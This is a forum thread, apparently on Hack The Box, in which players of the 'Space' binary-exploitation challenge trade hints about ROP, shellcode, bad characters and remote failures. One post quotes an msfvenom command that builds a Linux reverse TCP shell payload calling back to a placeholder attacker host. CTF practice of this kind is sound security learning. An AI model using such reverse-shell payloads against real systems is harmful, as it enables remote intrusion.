SPACE [PWN]

Hi everybody! I managed to solve the challenge in the intended way, at least I think it is. Could somebody PM me to discuss the solution or other alternative ones?

Please PM with help for reverse shell. I have something working locally. I think I solved the ‘space’ issue, but then I’ve tried adding on a payload like ‘msfvenom -p linux/x86/shell_reverse_tcp -f raw -b '\x00\x0a\x20' LHOST=MYIP LPORT=MYPORT -o msfpayload’ and it works locally but not remotely. I’ve tried making sure my firewall is open.

If anyone managed to solve it using ROP, please let me know (:

I have solved it with a two stage payload.

Could I DM someone about this challenge? I’ve been working it for a while, and I think I need a nudge.

167.71.143.20:30766

I can’t connect to this host instance. Can someone help me??

@1z3n said:

167.71.143.20:30766

I can’t connect to this host instance. Can someone help me??

Possibly - although raising a Jira ticket is probably the best course if it is an issue with HTB.

How are you trying to connect?
What error messages are you getting?

Without knowing the problem, it is very hard to help.

Ah finally got it (without ROP)… took me time to find a good shellcode, so many don’t work. I learnt a lot. Not easy at all for beginners!

Could I DM someone about this challenge? I have shellcode being executed but no shell.

Hi, could I get a nudge on the direction to go with this, please? I have the following ideas, but no go, 'cos the libc binary used on the server is not provided for download:

  1. ROP to execve function
    • libc binary not provided and execve not imported by the space binary
  2. ROP to syscall
    • binary does not contain executable byte sequences for syscall (0x0F 0x05), sysenter (0x0F 0x34) or int 0x80 (0xCD 0x80)

@hacked11 said:

Hi, could I get a nudge on the direction to go with this, please? I have the following ideas, but no go, 'cos the libc binary used on the server is not provided for download:

  1. ROP to execve function
    • libc binary not provided and execve not imported by the space binary
  2. ROP to syscall
    • binary does not contain executable byte sequences for syscall (0x0F 0x05), sysenter (0x0F 0x34) or int 0x80 (0xCD 0x80)

ok, got it… turns out I was overthinking and the binary is less hardened than I had assumed it to be…

Hi! Solved with ROP, can anyone PM me the intended way please?
It was not easy at all for me.

I’ve just finished this machine with a little help but there’s a part I don’t really understand and my helper couldn’t explain it. Can I PM someone to check my solution?

@dosxuz said:

Can anyone please point me in the right direction? I am having a problem getting a leak.

This might help a bit.

Hi,
First time writing here on the Forum. I’d like to ask for a little sanity check, since I’m pretty new to this kind of challenge. Long story short, I’ve crafted \bin\sh payload without using ROP (don’t know how it works yet). The payload works fine on my machine (either in Radare or outside it) but it’s faulty on the remote server. I recognize that on my machine I can control many things (the env, for once) that I cannot control on the remote server, thus I’d like to ask… am I using the correct approach or should I use a different one (one that probably I’m unaware of)? Any insight is welcome.
Thanks

DM me on Discord, I might be able to help you: kavigihan#8518

Great challenge for learning the skills!